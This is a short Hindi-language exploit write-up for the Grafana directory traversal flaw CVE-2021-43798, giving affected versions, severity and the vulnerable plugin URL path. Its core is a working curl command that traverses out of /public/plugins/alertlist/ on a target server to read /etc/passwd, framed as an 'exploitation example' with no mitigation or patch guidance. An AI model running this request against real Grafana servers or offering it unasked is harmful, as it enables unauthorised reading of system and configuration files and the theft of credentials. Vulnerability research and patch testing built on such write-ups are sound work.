
Grafana डायरेक्ट्री ट्रैवर्सल (CVE-2021-43798) के लिए एक्सप्लॉइट, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से अनधिकृत फ़ाइल पढ़ने की अनुमति देता है।
प्रभावित संस्करण: Grafana 8.0.0-beta1 से 8.3.0 तक (पैच किए गए संस्करणों को छोड़कर)
कमजोरी का प्रकार: Directory Traversal (निर्देशिका में भ्रमण)
प्रभाव स्तर: अत्यंत खतरनाक (Critical)
प्लेटफ़ॉर्म: Grafana (ओपन-सोर्स मॉनिटरिंग और ऑब्ज़र्वेबिलिटी प्लेटफ़ॉर्म)
⚠️ कमजोरी का विवरण Grafana में निम्नलिखित URL के माध्यम से निर्देशिका ट्रैवर्सल किया जा सकता है:
Code http://<grafana_host>/public/plugins// इसके द्वारा हमलावर सर्वर पर स्थानीय फ़ाइलों को पढ़ सकता है। उदाहरण के लिए, /etc/passwd या कॉन्फ़िगरेशन फ़ाइलों तक अनधिकृत पहुँच।
🔥 शोषण उदाहरण एक साधारण अनुरोध के माध्यम से फ़ाइल पढ़ना:
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd उपरोक्त अनुरोध के माध्यम से Linux सिस्टम पर उपयोगकर्ताओं की सूची प्राप्त की जा सकती है।